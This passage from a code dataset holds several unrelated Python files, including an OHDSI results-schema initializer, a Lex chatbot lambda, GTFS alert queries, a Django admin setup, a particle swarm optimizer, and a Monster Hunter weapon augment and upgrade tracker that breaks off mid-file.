resources:\n# https://github.com/OHDSI/WebAPI/wiki/CDM-Configuration#results-schema-tables\n# 
https://github.com/OHDSI/WebAPI/blob/v2.13.0/src/main/java/org/ohdsi/webapi/service/DDLService.java#L136\n\n\ndef run(config: GlueConfig, api: WebAPIClient):\n \"\"\"create the results schema in the CDM DB\"\"\"\n logger.info(\"connecting to CDM database\")\n with MultiDB(*config.cdm_db_params()) as cdm_db:\n logger.info(\"starting\")\n # ensure the results schema exists\n # creating it here will not enable our next steps, but it\n # may be helpful if the other tools aren't creating it\n ensure_schema(cdm_db, config.results_schema)\n\n # see if the results.cohort table exists, if so init has already happened\n canary_table = \"cohort\"\n if canary_table in cdm_db.list_tables(config.results_schema):\n logger.info(\n \"found canary table (%s), init has already happened\", canary_table\n )\n return\n ddl = api.get_results_ddl()\n logger.info(\"got %s-byte sql blob from webapi. Executing...\", len(ddl))\n cdm_db.execute(ddl)\n logger.info(\"done\")\n","repo_name":"edencehealth/ohdsi-glue","sub_path":"src/glue/operations/init_results_schema.py","file_name":"init_results_schema.py","file_ext":"py","file_size_in_byte":1411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30742502726","text":"# Created by jongwonkim on 07/07/2017.\n\n\nimport os\nimport logging\nimport json\nimport requests\nimport boto3\nimport time\nfrom src.dynamodb.intents import DbIntents\n\nlog = logging.getLogger()\nlog.setLevel(logging.DEBUG)\ndb_intents = DbIntents(os.environ['INTENTS_TABLE'])\nsns = boto3.client('sns')\n\n\ndef compose_validate_response(event):\n event['intents']['current_intent'] = 'AskTaste'\n print(\"!! compose validate !!\")\n print(event)\n\n artists = []\n if event['currentIntent']['slots']['Artist']:\n artists = event['currentIntent']['slots']['Artist'].strip().split(',')\n for artist in artists:\n if artist not in event['intents']['artists']:\n event['intents']['artists'].append(artist)\n\n genres = []\n if event['currentIntent']['slots']['Genre']:\n genres = event['currentIntent']['slots']['Genre'].strip().split(',')\n for genre in genres:\n if genre not in event['intents']['genres']:\n event['intents']['genres'].append(genre)\n\n if not event['currentIntent']['slots']['Artist'] and not event['currentIntent']['slots']['Genre']:\n if event['inputTranscript'] != 'THIS ASK TASTE INTENT SHOULD NOT BE INVOKED BY ANY UTTERANCES':\n check = requests.get(os.environ['BIT_ARTIST_URL'].format(event['inputTranscript'])).json()\n if 'errors' not in check:\n event['intents']['artists'].append(event['inputTranscript'])\n else:\n # publish SNS\n sns_event = {\n 'token': event['sessionAttributes']['bot_token'],\n 'channel': event['sessionAttributes']['channel_id'],\n 'text': \"I'm sorry, I'm having trouble finding that artist or genre :( Please check the spelling \"\n \"and try again.\"\n }\n sns.publish(\n TopicArn=os.environ['POST_MESSAGE_SNS_ARN'],\n Message=json.dumps({'default': json.dumps(sns_event)}),\n MessageStructure='json'\n )\n time.sleep(.5)\n # Check whether both slots are empty.\n # If so, pass the whole string value to the API\n # If something returns, then manually store into artist.\n # If not, publish sns message \"I'm sorry, I couldn't understand that. 
Could you try again?\"\n\n # if event['currentIntent']['slots']['Artist'] and event['currentIntent']['slots']['Genre']:\n response = {'sessionAttributes': event['sessionAttributes'], 'dialogAction': {\n 'type': 'ConfirmIntent',\n \"intentName\": \"AskTaste\",\n 'slots': {\n 'Artist': None,\n 'Genre': None\n }\n }}\n # else:\n # response = {'sessionAttributes': event['sessionAttributes'], 'dialogAction': {\n # 'type': 'Delegate',\n # 'slots': {\n # 'Artist': event['currentIntent']['slots']['Artist'],\n # 'Genre': event['currentIntent']['slots']['Genre']\n # }\n # }}\n return response\n\n # if event['currentIntent']['slots']['Genre']:\n # genres = event['currentIntent']['slots']['Genre'].strip().split(',')\n # for genre in genres:\n # if genre not in event['intents']['genres']:\n # event['intents']['genres'].append(genre)\n # artist = None\n # if len(event['intents']['artists']) > 0:\n # artist = event['intents']['artists'][0]\n # # To keep getting genres and store in the db session.\n # response = {'sessionAttributes': event['sessionAttributes'], 'dialogAction': {\n # 'type': 'ConfirmIntent',\n # \"intentName\": \"AskTaste\",\n # 'slots': {\n # 'Artist': artist,\n # 'Genre': event['intents']['genres'][0]\n # }\n # }}\n # return response\n #\n # elif event['currentIntent']['slots']['Artist']:\n # artists = event['currentIntent']['slots']['Artist'].strip().split(',')\n # for artist in artists:\n # if artist not in event['intents']['artists']:\n # event['intents']['artists'].append(artist)\n # genre = None\n # if len(event['intents']['genres']) > 0:\n # genre = event['intents']['genres'][0]\n # # To keep getting artists and store in the db session.\n # response = {'sessionAttributes': event['sessionAttributes'], 'dialogAction': {\n # 'type': 'ConfirmIntent',\n # \"intentName\": \"AskTaste\",\n # 'slots': {\n # 'Artist': event['intents']['artists'][0],\n # 'Genre': genre\n # }\n # }}\n # return response\n #\n # else: # First time.\n #\n\n\n# End of the AskTaste intention moves to the CreateChannel intention.\ndef compose_fulfill_response(event):\n event['intents']['current_intent'] = 'AskCity'\n response = {\n 'sessionAttributes': event['sessionAttributes'],\n 'dialogAction': {\n 'type': 'ElicitSlot',\n 'intentName': 'AskCity',\n 'slotToElicit': 'City',\n 'slots': {\n 'City': None\n },\n }\n }\n return response\n\n\ndef retrieve_intents(event):\n if 'sessionAttributes' not in event:\n raise Exception('Required keys: `team_id` and `channel_id` are not provided.')\n event['intents'] = db_intents.retrieve_intents(\n event['sessionAttributes']['team_id'],\n event['sessionAttributes']['channel_id']\n )\n\n\ndef store_intents(event):\n return db_intents.store_intents(\n keys={\n 'team_id': event['sessionAttributes']['team_id'],\n 'channel_id': event['sessionAttributes']['channel_id']\n },\n attributes=event['intents']\n )\n\n\ndef handler(event, context):\n log.info(json.dumps(event))\n response = {\n \"statusCode\": 200\n }\n try:\n retrieve_intents(event)\n if event['currentIntent'] is not None and event['currentIntent']['confirmationStatus'] == 'Denied' and event[\n 'inputTranscript'].lower() in ['no', 'no thanks', 'nope', 'nah']: # TODO determine if proper strategy\n # Terminating condition.\n print(\"!!!! 
TERMINATOR !!!!\")\n print(event)\n response = compose_fulfill_response(event)\n else:\n # Processing the user input.\n response = compose_validate_response(event)\n store_intents(event)\n except Exception as e:\n response = {\n \"statusCode\": 400,\n \"body\": json.dumps({\"message\": str(e)})\n }\n finally:\n log.info(response)\n return response\n","repo_name":"MyMusicTaste/my-music-mate","sub_path":"src/lex/lambda/ask-taste.py","file_name":"ask-taste.py","file_ext":"py","file_size_in_byte":6640,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"70148387114","text":"from ott.gtfsdb_realtime.model.alert_entity import AlertEntity\n\nfrom .base import Base\n\nimport datetime\nimport logging\nlogging.basicConfig(level=logging.INFO)\nlog = logging.getLogger(__file__)\n\n\nclass AlertQueries(Base):\n\n # static vals (which can be over-ridden on a class / instance level) to be used by the sort routine\n filter_future = False\n filter_past = True\n inverse_sort = True\n\n @classmethod\n def query_via_route_id(cls, session, route_id, agency_id=None, limit=None):\n return cls._base_query(session, AlertEntity, route_id, None, agency_id, limit)\n\n @classmethod\n def query_via_stop_id(cls, session, stop_id, agency_id=None, limit=None):\n return cls._base_query(session, AlertEntity, None, stop_id, agency_id, limit)\n\n @classmethod\n def query_all(cls, session, agency_id=None, limit=None):\n return cls._base_query(session, AlertEntity, None, None, agency_id, limit)\n\n @classmethod\n def unique_sort(cls, alert_entity_list):\n \"\"\"\n de-duplicate and sort alerts from an entity list\n \"\"\"\n ret_val = []\n\n # step 1: sort for unique alerts (and also sort past / future, if specified)\n alert_hash = {}\n now = datetime.datetime.now()\n for e in alert_entity_list:\n if cls.filter_past and e.end < now: continue\n if cls.filter_future and e.begin > now: continue\n alert_hash[e.alert_id] = e.alert\n\n # step 2: sort alerts\n ret_val = alert_hash.values()\n # ret_val.sort(key=lambda x: x.start, reverse=reverse_sort)\n return ret_val\n\n @classmethod\n def print_alert(cls, index=\"\", alert=None):\n print(\"{}: {}\".format(index, alert.description_text))\n\n\ndef alerts_command_line():\n \"\"\"\n command line query of alerts.\n example:\n bin/gtfsrt-alerts-cmd -d loc -s trimet -l 7\n \"\"\"\n from ott.utils.parse.cmdline import db_cmdline\n from ott.utils.parse.cmdline import gtfs_cmdline\n from .base import get_session_via_cmdline\n\n parser = db_cmdline.db_parser('bin/gtfsrt-alerts-cmd')\n gtfs_cmdline.simple_stop_route_parser(parser)\n # parse the command-line arguments before using them below\n args = parser.parse_args()\n session = get_session_via_cmdline(args)\n\n ## NOTE: fun little test of casting a Base class in an object to a child\n a = Base()\n a.__class__ = AlertQueries\n a.inverse_sort = False\n print(a.inverse_sort, AlertQueries.inverse_sort)\n\n # import pdb; pdb.set_trace()\n msg = \"VIA\"\n if args.route_id or args.stop_id:\n ae = []\n se = []\n if args.route_id:\n msg += \" ROUTES\"\n ae = a.query_via_route_id(session, args.route_id, limit=args.limit)\n if args.stop_id:\n msg += \" STOPS\"\n se = a.query_via_stop_id(session, args.stop_id, limit=args.limit)\n entities = ae + se\n else:\n msg = \"ALL\"\n entities = a.query_all(session, limit=args.limit)\n\n print(\"\\n\\n{} ALERTS:\".format(msg))\n for i, e in enumerate(entities):\n a.print_alert(i+1, e.alert)\n 
print(\"\\n\")\n","repo_name":"OpenTransitTools/gtfsdb_realtime","sub_path":"ott/gtfsdb_realtime/control/alert_queries.py","file_name":"alert_queries.py","file_ext":"py","file_size_in_byte":3015,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"72"} +{"seq_id":"28935613588","text":"from django.contrib import admin\n\n# Register your models here.\n\nfrom .models import BookInfo, HeroInfo\n\n\nclass HeroInfoInline(admin.StackedInline):\n model = HeroInfo\n extra = 2\n # 这个数字表示在添加BookInfo的时候会列出1个表单让填写HeroInfo\n # 继承StackedInline表示显示的添加表单形式是stack形式的,还有TabularInline\n\n\nclass BookInfoAdmin(admin.ModelAdmin):\n # 自定义model的管理页面\n list_display = ['id', 'btitle', 'bpub_date']\n list_filter = ['id', 'btitle', 'bpub_date']\n search_fields = ['btitle']\n fields = ['bpub_date', 'btitle']\n list_per_page = 10\n\n actions_on_top = True\n # actions_on_bottom = True\n\n inlines = [HeroInfoInline]\n\n\nclass HeroInfoAdmin(admin.ModelAdmin):\n list_display = ['id', 'hname', 'hgender', 'book', 'content']\n search_fields = ['hname']\n\n\nadmin.site.register(BookInfo, BookInfoAdmin)\nadmin.site.register(HeroInfo, HeroInfoAdmin)\n\n# admin使用总结:\n# 1. 添加管理员账户\n# 2. 使用admin注册Model类(如需自定义展示页面则可以自定义类继承admin.ModelAdmin)\n","repo_name":"Mrfranken/djangostudying","sub_path":"test1/bootest/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1109,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"5565159901","text":"from PyQt5.QtCore import pyqtSignal, pyqtSlot, QThread\nimport numpy as np\nimport random\nimport math\nimport copy\nfrom particle import Particle\nfrom IPython import embed\n\nclass PSO(QThread):\n sig_train_detail = pyqtSignal(int, float, float, float)\n def __init__(self, train_data, iter_times, population_len, mean_range, inertia_weight, social_weight, cognitive_weight, rbfn):\n super().__init__()\n self.train_data = train_data\n self.iter_times = iter_times\n self.population_len = population_len\n self.optimized = rbfn\n\n self.inertia_weight = inertia_weight\n self.social_weight = social_weight\n self.cognitive_weight = cognitive_weight\n\n self.dev_max = rbfn.dev_max\n self.m_range = mean_range\n self.num_rbfn_neuron = self.optimized.num_neuron\n self.data_dim = self.optimized.data_dim\n self.population = []\n\n self.exit = False\n\n def run(self):\n for _ in range(self.population_len):\n self.population.append(Particle(self.m_range, self.data_dim, self.num_rbfn_neuron, self.dev_max, self.optimized, self.train_data))\n min_err = math.inf\n self.best_individual = copy.deepcopy(self.population[0])\n self.g_best = self.best_individual\n for t in range(self.iter_times):\n if self.exit:\n break\n self.update_best_fitness()\n min_err = self.best_individual.fitness\n self.sig_train_detail.emit(t+1, min_err, self.g_best.fitness, self.avg_err)\n\n for individual in self.population:\n individual.update_position(self.inertia_weight, self.cognitive_weight, self.social_weight, self.best_individual.position)\n\n self.update_best_fitness()\n self.sig_train_detail.emit(t+1, min_err, self.g_best.fitness, self.avg_err)\n \n self.optimized.update_parameters(self.best_individual.position)\n\n def update_best_fitness(self):\n sum_err = 0\n for individual in self.population:\n sum_err += individual.update_fitness()\n self.g_best = min(self.g_best, individual, key = lambda x: x.fitness)\n self.avg_err = sum_err/self.population_len\n if self.best_individual.fitness > self.g_best.fitness:\n 
self.best_individual = copy.deepcopy(self.g_best)\n @pyqtSlot()\n def stop(self):\n self.exit = True","repo_name":"tsaooo/PSO_RBFN_Car","sub_path":"pso.py","file_name":"pso.py","file_ext":"py","file_size_in_byte":2391,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"17014292350","text":"# -*- coding: ascii -*-\n\n\"\"\"\nFilename: query_weapons.py\nAuthor: contact@simshadows.com\n\nThis file provides the MHWI build optimizer script's weapon database queries.\n\"\"\"\n\nimport json\nimport logging\nfrom abc import ABC, abstractmethod\nfrom collections import namedtuple\nfrom itertools import accumulate, product, zip_longest\nfrom enum import Enum, auto\nfrom copy import copy\n\nfrom .utils import prune_by_superceding\nfrom .loggingutils import ExecutionProgress, dump_pruned_weapon_combos\n\nfrom .database_skills import SetBonus\n\nfrom .database_weapons import (SHARPNESS_LEVEL_NAMES,\n MaximumSharpness,\n WeaponAugmentationScheme,\n WeaponUpgradeScheme,\n weapon_db)\n\n\nlogger = logging.getLogger(__name__)\n\n\nWeaponAugmentsContribution = namedtuple(\n \"WeaponAugmentsContribution\",\n [\n \"added_attack_power\",\n \"added_raw_affinity\",\n \"extra_decoration_slot_level\",\n ],\n)\nclass WeaponAugmentTracker(ABC):\n\n @classmethod\n def get_instance(cls, weapon):\n #assert isinstance(weapon, namedtuple) # TODO: Make a proper assertion.\n if weapon.augmentation_scheme is WeaponAugmentationScheme.ICEBORNE:\n return IBWeaponAugmentTracker(weapon.rarity)\n elif weapon.augmentation_scheme is WeaponAugmentationScheme.NONE:\n return NoWeaponAugments()\n else:\n raise RuntimeError(f\"Augmentation scheme {weapon.augmentation_scheme} not supported.\")\n\n @classmethod\n def get_maximized_trackers(cls, weapon, *, health_regen_minimum):\n trackers = []\n\n bare_tracker = cls.get_instance(weapon)\n for config_obj in bare_tracker.get_maximized_configs(health_regen_minimum=health_regen_minimum):\n tracker = cls.get_instance(weapon)\n tracker.update_with_config(config_obj)\n trackers.append(tracker)\n\n return trackers\n\n # TODO: Use something better, like the __copy__() method.\n @abstractmethod\n def copy(self):\n raise NotImplementedError\n\n # Outputs some arbitrary structure.\n #\n # This function is only really intended for diagnostic purposes for now, but will be given more important roles\n # later. 
I'll properly define the structure then.\n @abstractmethod\n def get_config(self):\n raise NotImplementedError\n\n # Similar to get_config(), but this returns an arbitrary string that the class can read to restore to the same augments.\n @abstractmethod\n def get_serialized_config(self):\n raise NotImplementedError\n\n # Gives back a WeaponAugmentsContribution namedtuple with all the values the current\n # set of augments contributes to the build.\n @abstractmethod\n def calculate_contribution(self):\n raise NotImplementedError\n\n # Gives back a list of arbitrary things describing all the possible maximum configurations.\n # You can pass one of these things to update_with_config.\n #\n # health_regen_minimum is the minimum level we need it to be.\n @abstractmethod\n def get_maximized_configs(self, health_regen_minimum=0):\n raise NotImplementedError\n\n # Set the config to the selected config.\n @abstractmethod\n def update_with_config(self, selected_config):\n raise NotImplementedError\n\n # Similar to update_with_config(), but you get a string returned by get_serialized_config().\n @abstractmethod\n def update_with_serialized_config(self, serialized_config):\n raise NotImplementedError\n\n # Returns a one-line string that represents the state of the tracker.\n # Mostly targeted for debugging purposes.\n @abstractmethod\n def to_str_debugging(self):\n raise NotImplementedError\n\n\nclass NoWeaponAugments(WeaponAugmentTracker):\n\n MAGIC_WORD = \"NoWeaponAugments\"\n\n def copy(self):\n return self # It shouldn't matter at all\n\n def get_config(self):\n return []\n\n def get_serialized_config(self):\n return self.MAGIC_WORD\n\n def calculate_contribution(self):\n ret = WeaponAugmentsContribution (\n added_attack_power = 0,\n added_raw_affinity = 0,\n extra_decoration_slot_level = 0,\n )\n return ret\n\n def get_maximized_configs(self, health_regen_minimum=0):\n if health_regen_minimum > 0:\n return []\n else:\n return None # Not possible to add health regen.\n\n def update_with_config(self, selected_config):\n raise RuntimeError(\"Can't update the augments of a weapon that can't be augmented.\")\n\n def update_with_serialized_config(self, serialized_config):\n assert serialized_config == self.MAGIC_WORD\n return\n\n def to_str_debugging(self):\n return \"Cannot augment this weapon.\"\n\n\nclass IBWeaponAugmentType(Enum):\n AUGMENT_LEVEL = auto() # This one's not really an augment.\n\n ATTACK_INCREASE = auto()\n AFFINITY_INCREASE = auto()\n #DEFENSE_INCREASE = auto() # I'm just gonna pretend these don't exist yet...\n SLOT_UPGRADE = auto()\n HEALTH_REGEN = auto()\n #ELEMENT_STATUS_EFFECT_UP = auto()\n\nclass IBWeaponAugmentTracker(WeaponAugmentTracker):\n\n __slots__ = [\n \"auto_maximize\",\n \"_rarity\",\n \"_aug_level\",\n \"_augments\",\n ]\n\n IB_AUGMENTATION_SLOTS = {\n 10: [5, 7, 9, 10],\n 11: [4, 5, 6, 8 ],\n 12: [3, 4, 5, 6 ],\n # 0 1 2 3 = slot level\n }\n\n IB_SLOT_CONSUMPTIONS = {\n IBWeaponAugmentType.ATTACK_INCREASE : [3, 2, 2, 2],\n IBWeaponAugmentType.AFFINITY_INCREASE : [2, 2, 2, 2],\n #IBWeaponAugmentType.DEFENSE_INCREASE : [1, 1, 1, 2],\n IBWeaponAugmentType.SLOT_UPGRADE : [3, 3, 1, 1],\n IBWeaponAugmentType.HEALTH_REGEN : [3, 2, 2, 2],\n #IBWeaponAugmentType.ELEMENT_STATUS_EFFECT_UP : [1, 2, 2, 2],\n }\n\n _IB_MAX_SLOT_LEVEL = 3 # This determines the maximum slot level, i.e. 
length of each IB_AUGMENTATION_SLOTS list.\n _IB_AUGMENT_MAX_LEVEL = 4 # This determines the maximum level of each of the IBWeaponAugmentTypes.\n\n IB_ATTACK_AUGMENT_VALUES = (0, 5, 5, 5, 5)\n IB_AFFINITY_AUGMENT_VALUES_PERCENTAGES = (0, 10, 5, 5, 5)\n # level = 0 1 2 3 4\n\n IB_SLOT_CONSUMPTIONS_CUMULATIVE = {k: list(accumulate(v)) for (k, v) in IB_SLOT_CONSUMPTIONS.items()}\n\n IB_ATTACK_AUGMENT_CUMULATIVE = tuple(accumulate(IB_ATTACK_AUGMENT_VALUES))\n IB_AFFINITY_AUGMENT_PERCENTAGES_CUMULATIVE = tuple(accumulate(IB_AFFINITY_AUGMENT_VALUES_PERCENTAGES))\n\n def __init__(self, rarity, auto_maximize=True):\n assert isinstance(rarity, int)\n assert isinstance(auto_maximize, bool)\n\n if auto_maximize == False:\n raise NotImplementedError(\"Only works with auto-maximize on for now.\")\n # To implement auto_maximize==False, we'd need to actually allow lower augment levels.\n\n self._auto_maximize = auto_maximize\n\n self._rarity = rarity\n self._aug_level = self._IB_MAX_SLOT_LEVEL\n self._augments = {} # {IBWeaponAugmentType: int}\n\n assert self._state_is_valid()\n return\n\n def copy(self):\n new = copy(self)\n new._augments = copy(self._augments)\n assert new._state_is_valid()\n return new\n\n def get_config(self):\n return list(self._augments.items())\n\n def get_serialized_config(self):\n augments = {k.name: v for (k, v) in self._augments.items()}\n\n data = {\n \"rarity\": self._rarity,\n \"aug_level\": self._aug_level,\n \"augments\": augments,\n }\n serialized_data = json.dumps(data)\n assert isinstance(serialized_data, str)\n return serialized_data\n\n def calculate_contribution(self):\n attack_level = self._augments.get(IBWeaponAugmentType.ATTACK_INCREASE, 0)\n affinity_level = self._augments.get(IBWeaponAugmentType.AFFINITY_INCREASE, 0)\n decoration_slot_level = self._augments.get(IBWeaponAugmentType.SLOT_UPGRADE, 0)\n\n ret = WeaponAugmentsContribution (\n added_attack_power = \\\n self.IB_ATTACK_AUGMENT_CUMULATIVE[attack_level],\n added_raw_affinity = \\\n self.IB_AFFINITY_AUGMENT_PERCENTAGES_CUMULATIVE[affinity_level],\n extra_decoration_slot_level = \\\n decoration_slot_level,\n )\n return ret\n\n def get_maximized_configs(self, health_regen_minimum=0):\n maximized_configs = []\n \n efr_augments = {\n IBWeaponAugmentType.ATTACK_INCREASE,\n IBWeaponAugmentType.AFFINITY_INCREASE,\n IBWeaponAugmentType.SLOT_UPGRADE,\n }\n\n picks = [[(aug, x) for x in range(self._IB_AUGMENT_MAX_LEVEL + 1)] for aug in efr_augments]\n # range() will go from 0 to 4. 
0 will mean no augment, and 1-4 will be each level.\n\n        for augs in product(*picks):\n            config = [(aug, level) for (aug, level) in augs if (level > 0)]\n\n            assert IBWeaponAugmentType.HEALTH_REGEN not in set(x for (x, _) in config) # Assume it's not in yet.\n            if health_regen_minimum > 0:\n                config.append((IBWeaponAugmentType.HEALTH_REGEN, health_regen_minimum))\n\n            if self._is_valid_configuration(config, self._rarity, self._aug_level):\n                maximized_configs.append(config)\n\n        return maximized_configs\n\n    def update_with_config(self, selected_config):\n        assert isinstance(selected_config, list) # May accept dicts later.\n        #assert (selected_config in self.get_maximized_configs()) or (len(selected_config) == 0) # Fails if our config isn't maximized\n        assert all((level >= 0) and (level <= 4) for (augment, level) in selected_config)\n\n        self._augments = {augment: level for (augment, level) in selected_config}\n\n        assert len(self._augments) == len(selected_config) # Quick check if we have any duplicates.\n        assert self._state_is_valid() # If our config breaks anything, it should be caught here\n        return\n\n    def update_with_serialized_config(self, serialized_config):\n        assert isinstance(serialized_config, str)\n\n        data = json.loads(serialized_config)\n\n        # We check that we're updating the right tracker.\n        assert self._rarity == data[\"rarity\"]\n        assert self._aug_level == data[\"aug_level\"]\n\n        self._augments = {IBWeaponAugmentType[k]: v for (k, v) in data[\"augments\"].items()}\n\n        assert self._state_is_valid()\n        return\n\n    def to_str_debugging(self):\n        return f\"[Augmentation Level: {self._aug_level}] \" + \",\".join(f\"{k.name}_{v}\" for (k, v) in self._augments.items())\n\n    def _state_is_valid(self):\n        config_list = list(self._augments.items())\n\n        ret = all(isinstance(k, IBWeaponAugmentType) and isinstance(v, int) for (k, v) in self._augments.items()) \\\n              and all((v >= 0) and (v <= 4) for (k, v) in self._augments.items()) \\\n              and (IBWeaponAugmentType.AUGMENT_LEVEL not in self._augments) \\\n              and self._is_valid_configuration(config_list, self._rarity, self._aug_level)\n        return ret\n\n    @classmethod\n    def _is_valid_configuration(cls, config_list, rarity, aug_level):\n        assert isinstance(config_list, list)\n        assert all(isinstance(aug, IBWeaponAugmentType) and isinstance(level, int) for (aug, level) in config_list)\n        assert all((level >= 0) and (level <= cls._IB_AUGMENT_MAX_LEVEL) for (_, level) in config_list)\n        assert len(config_list) == len(set(x for (x, _) in config_list))\n\n        slots_maximum = cls.IB_AUGMENTATION_SLOTS[rarity][aug_level]\n\n        slots_used = 0\n        for (aug, level) in config_list:\n            if level > 0:\n                slots_used += cls.IB_SLOT_CONSUMPTIONS_CUMULATIVE[aug][level - 1]\n                # IMPORTANT: Need to remember that the slot consumptions list starts at level 1.\n        return slots_used <= slots_maximum\n\n\nWeaponUpgradesContribution = namedtuple(\n    \"WeaponUpgradesContribution\",\n    [\n        \"added_attack_power\",\n        \"added_raw_affinity\",\n        \"extra_decoration_slot_level\",\n        \"new_max_sharpness_values\",\n        \"set_bonus\",\n    ],\n)\nclass WeaponUpgradeTracker(ABC):\n\n    @classmethod\n    def get_instance(cls, weapon):\n        #assert isinstance(weapon, namedtuple) # TODO: Make a proper assertion.\n        if weapon.upgrade_scheme is WeaponUpgradeScheme.ICEBORNE_COMMON:\n            return IBCWeaponUpgradeTracker()\n        elif weapon.upgrade_scheme is WeaponUpgradeScheme.SAFI_STANDARD:\n            return SafiWeaponUpgrades()\n        elif weapon.upgrade_scheme is WeaponUpgradeScheme.NONE:\n            return NoWeaponUpgrades()\n        
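# NOTE: any new WeaponUpgradeScheme variant added to the weapon database needs its own\n        # branch above, otherwise it falls through to the RuntimeError below.\n        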
else:\n raise RuntimeError(f\"Upgrade scheme {weapon.upgrade_scheme} not supported.\")\n\n # TODO: Consider pruning configurations that are clearly inferior, rather than just pruning\n # configurations that have unique contributions.\n @classmethod\n def get_maximized_trackers_pruned(cls, weapon):\n trackers = []\n seen_tracker_contributions = set()\n\n bare_tracker = cls.get_instance(weapon)\n for config_obj in bare_tracker.get_maximized_configs():\n tracker = cls.get_instance(weapon)\n tracker.update_with_config(config_obj)\n\n contribution = tracker.calculate_contribution()\n if contribution not in seen_tracker_contributions:\n seen_tracker_contributions.add(contribution)\n trackers.append(tracker)\n\n return trackers\n\n # TODO: Use something better, like the __copy__() method.\n @abstractmethod\n def copy(self):\n raise NotImplementedError\n\n # Similar to WeaponAugmentTracker\n @abstractmethod\n def get_config(self):\n raise NotImplementedError\n\n # Similar to WeaponAugmentTracker\n @abstractmethod\n def get_serialized_config(self):\n raise NotImplementedError\n\n # Similar to WeaponAugmentTracker\n @abstractmethod\n def calculate_contribution(self):\n raise NotImplementedError\n\n # Similar to WeaponAugmentTracker\n @abstractmethod\n def get_maximized_configs(self):\n raise NotImplementedError\n\n # Similar to WeaponAugmentTracker\n @abstractmethod\n def update_with_config(self, selected_config):\n raise NotImplementedError\n\n # Similar to WeaponAugmentTracker\n @abstractmethod\n def update_with_serialized_config(self, serialized_config):\n raise NotImplementedError\n\n # Similar to WeaponAugmentTracker\n @abstractmethod\n def to_str_debugging(self):\n raise NotImplementedError\n\n\nclass NoWeaponUpgrades(WeaponUpgradeTracker):\n\n MAGIC_WORD = \"NoWeaponUpgrades\"\n\n def copy(self):\n return self # It shouldn't matter at all\n\n def get_config(self):\n return []\n\n def get_serialized_config(self):\n return self.MAGIC_WORD\n\n def calculate_contribution(self):\n ret = WeaponUpgradesContribution (\n added_attack_power = 0,\n added_raw_affinity = 0,\n extra_decoration_slot_level = 0,\n new_max_sharpness_values = None,\n set_bonus = None,\n )\n return ret\n\n def get_maximized_configs(self):\n return [None]\n\n def update_with_config(self, selected_config):\n if selected_config is not None:\n raise RuntimeError(\"Can't update the upgrades of a weapon that can't be upgraded.\")\n return\n\n def update_with_serialized_config(self, serialized_config):\n assert serialized_config == self.MAGIC_WORD\n\n def to_str_debugging(self):\n return \"Cannot upgrade this weapon.\"\n\n\nclass IBCWeaponUpgradeType(Enum):\n ATTACK = auto()\n AFFINITY = auto()\n #ELEMENTAL_STATUS = auto() # I'm just gonna pretend these don't exist yet...\n #DEFENSE = auto()\n\n\nclass IBCWeaponUpgradeTracker(WeaponUpgradeTracker):\n\n __slots__ = [\n \"_upgrades\",\n ]\n\n _IB_ATTACK_UPGRADE_VALUES = (1, 1, 1, 1, 1, 1 , 2)\n _IB_AFFINITY_UPGRADE_VALUES = (1, 1, 1, 1, 1, None, 3)\n # level = 1 2 3 4 5 6 7\n\n _m1 = [\n [IBCWeaponUpgradeType.ATTACK] * 6,\n ([IBCWeaponUpgradeType.AFFINITY] * 1) + ([IBCWeaponUpgradeType.ATTACK] * 5),\n ([IBCWeaponUpgradeType.AFFINITY] * 2) + ([IBCWeaponUpgradeType.ATTACK] * 4),\n ([IBCWeaponUpgradeType.AFFINITY] * 3) + ([IBCWeaponUpgradeType.ATTACK] * 3),\n ([IBCWeaponUpgradeType.AFFINITY] * 4) + ([IBCWeaponUpgradeType.ATTACK] * 2),\n ([IBCWeaponUpgradeType.AFFINITY] * 5) + ([IBCWeaponUpgradeType.ATTACK] * 1),\n ]\n _m2 = [\n [IBCWeaponUpgradeType.ATTACK],\n 
[IBCWeaponUpgradeType.AFFINITY],\n ]\n\n # TODO: Consider automating this definition better.\n _MAXIMIZED_CONFIGS = [(x + y) for (x, y) in product(_m1, _m2)]\n\n def __init__(self):\n self._upgrades = []\n assert self._state_is_valid()\n return\n\n def copy(self):\n new = copy(self)\n new._upgrades = copy(self._upgrades)\n assert new._state_is_valid()\n return new\n\n def get_config(self):\n return copy(self._upgrades)\n\n def get_serialized_config(self):\n upgrades_strs = [(x.name if (x is not None) else None) for x in self._upgrades]\n\n serialized_data = json.dumps(upgrades_strs)\n assert isinstance(serialized_data, str)\n return serialized_data\n\n def calculate_contribution(self):\n # IMPORTANT: We're actually mostly just relying on this function for debugging.\n # If this function doesn't raise an exception, then we're good.\n added_attack_power = 0\n added_raw_affinity = 0\n for (i, upgrade) in enumerate(self._upgrades):\n assert i < len(self._IB_ATTACK_UPGRADE_VALUES)\n if upgrade is IBCWeaponUpgradeType.ATTACK:\n added_attack_power += self._IB_ATTACK_UPGRADE_VALUES[i]\n elif upgrade is IBCWeaponUpgradeType.AFFINITY:\n added_raw_affinity += self._IB_AFFINITY_UPGRADE_VALUES[i]\n else:\n raise RuntimeError(\"Unsupported upgrade type found: \" + str(type(upgrade)))\n\n ret = WeaponUpgradesContribution (\n added_attack_power = added_attack_power,\n added_raw_affinity = added_raw_affinity,\n extra_decoration_slot_level = 0,\n new_max_sharpness_values = None,\n set_bonus = None,\n )\n return ret\n\n def get_maximized_configs(self):\n return self._MAXIMIZED_CONFIGS\n\n def update_with_config(self, selected_config):\n if selected_config is None:\n self._upgrades = []\n else:\n assert isinstance(selected_config, list)\n self._upgrades = selected_config\n assert self._state_is_valid()\n return\n\n def update_with_serialized_config(self, serialized_config):\n assert isinstance(serialized_config, str)\n\n upgrades_strs = json.loads(serialized_config)\n \n assert isinstance(upgrades_strs, list)\n\n self._upgrades = [(IBCWeaponUpgradeType[x] if (x is not None) else None) for x in upgrades_strs]\n \n assert self._state_is_valid()\n return\n\n def to_str_debugging(self):\n return \",\".join(x.name for x in self._upgrades)\n\n def _state_is_valid(self):\n # We generally just rely on calculate_contribution() to raise exceptions when something's wrong.\n return (len(self._upgrades) <= 7)\n\n\nclass 